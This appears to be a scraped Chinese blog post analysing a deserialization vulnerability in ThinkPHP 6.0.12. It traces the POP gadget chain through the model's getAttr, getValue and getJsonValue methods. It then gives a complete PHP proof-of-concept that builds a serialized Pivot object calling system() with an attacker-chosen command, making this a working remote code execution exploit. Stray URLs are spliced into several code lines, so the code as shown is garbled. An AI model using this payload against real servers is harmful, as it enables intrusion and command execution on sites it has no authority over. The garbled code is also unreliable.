Thinkphp最新版本漏洞分析( 二 ) _Thinkphp

跟进getAttr方法，漏洞方法是getValue，但传入getValue方法中的$value是由getData方法得到的。

文章插图

public function getAttr(string $name){try {$relation = false;$value= https://www.isolves.com/it/cxkf/yy/php/2022-02-28/$this->getData($name);} catch (InvalidArgumentException $e) {$relation = $this->isRelationAttr($name);$value= null;}return $this->getValue($name, $value, $relation);

跟进getData方法，$this->data可控，$fieldName来自getRealFieldName方法。

文章插图

跟进getRealFieldName方法，默认直接返回传入的参数。所以$fieldName也可控，也就是传入getValue的$value参数可控。

文章插图

跟进getValue方法，在Thinkphp6.0.8触发的漏洞点在①处，但在Thinkphp6.0.12时已经对传入的$closure进行判断。此次漏洞方法的getJsonValue方法。但需要经过两个if判断，$this->withAttr和$this->json都可控，可顺利进入getJsonValue方法。

文章插图

protected function getValue(string $name, $value, $relation = false){// 检测属性获取器$fieldName = $this->getRealFieldName($name);if (array_key_exists($fieldName, $this->get)) {return $this->get[$fieldName];}$method = 'get' . Str::studly($name) . 'Attr';if (isset($this->withAttr[$fieldName])) {if ($relation) {$value = https://www.isolves.com/it/cxkf/yy/php/2022-02-28/$this->getRelationValue($relation);}if (in_array($fieldName, $this->json) && is_array($this->withAttr[$fieldName])) {$value = $this->getJsonValue($fieldName, $value);

跟进getJsonValue方法，触发漏洞的点在$closure($value[$key], $value)只要令$this->jsonAssoc为True就行。
$closure和$value都可控。

文章插图

protected function getJsonValue($name, $value){if (is_null($value)) {return $value;}foreach ($this->withAttr[$name] as $key => $closure) {if ($this->jsonAssoc) {$value[$key] = $closure($value[$key], $value);

完整POP链条

文章插图
【Thinkphp最新版本漏洞分析】
POC编写

<?phpnamespace think{abstract class Model{private $lazySave = false;private $data = https://www.isolves.com/it/cxkf/yy/php/2022-02-28/[];private $exists = false;protected $table;private $withAttr = [];protected $json = [];protected $jsonAssoc = false;function __construct($obj = ''){$this->lazySave = True;$this->data = ['whoami' => ['dir']];$this->exists = True;$this->table = $obj;$this->withAttr = ['whoami' => ['system']];$this->json = ['whoami',['whoami']];$this->jsonAssoc = True;}}}namespace thinkmodel{use thinkModel;class Pivot extends Model{}}namespace{echo(base64_encode(serialize(new thinkmodelPivot(new thinkmodelPivot()))));}

利用